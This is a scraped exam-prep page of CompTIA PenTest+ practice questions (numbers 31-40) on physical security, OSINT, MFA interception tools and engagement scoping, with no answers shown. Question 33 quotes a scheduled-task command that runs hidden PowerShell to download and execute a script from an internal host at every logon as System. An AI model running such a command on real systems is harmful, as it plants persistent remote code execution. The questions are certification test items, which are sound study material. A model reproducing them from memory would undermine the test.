Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Exam

Last Update 10 hours ago Total Questions : 336

The CompTIA PenTest+ Exam content is now fully updated, with all current exam questions added 10 hours ago. Deciding to include PT0-003 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-003 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-003 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Exam practice test comfortably within the allotted time.

Question # 31

Which of the following can an access control vestibule help deter?

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Question # 32

While conducting OSINT, a penetration tester discovers the client ' s administrator posted part of an unsanitized firewall configuration to a troubleshooting message board. Which of the following did the penetration tester most likely use?

A.

HTML scraping

B.

Public code repository scanning

C.

Wayback Machine

D.

Search engine enumeration

Question # 33

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:

schtasks /create /tn Updates /tr " C:\windows\syswow64\Windows\WindowsPowerShell\v1.0\powershell.exe hidden -NoLogo -NonInteractive -ep bypass -nop -c ' IEX ((new-object net.webclient).downloadstring( ' http://10.10.1.2/asd ' )) ' " /sc onlogon /ru System

Which of the following does this action accomplish?

A.

Upgrades the shell performing a privilege escalation activity

B.

Uses the Windows Update service to move the shell connection and avoid detection

C.

Maintains access into the compromised computer

D.

Forwards all the communication from the compromised host to the host 10.10.1.2

Question # 34

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Question # 35

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question # 36

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

A.

Censys.io

B.

Shodan

C.

Wayback Machine

D.

SpiderFoot

Question # 37

A penetration tester wants to bypass multi-factor authentication by intercepting traffic between the client and a web server. Which of the following is the most appropriate tool for this task?

A.

Gophish

B.

Recon-ng

C.

BeEF

D.

Evilginx

E.

Yersinia

Question # 38

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Question # 39

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?

A.

Perform information-gathering techniques to review internet-facing assets for the company.

B.

Perform a phishing assessment to try to gain access to more resources and users’ computers.

C.

Perform a physical security review to identify vulnerabilities that could affect the company.

D.

Perform a vulnerability assessment over the main domain address provided by the client.

Question # 40

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Go to page: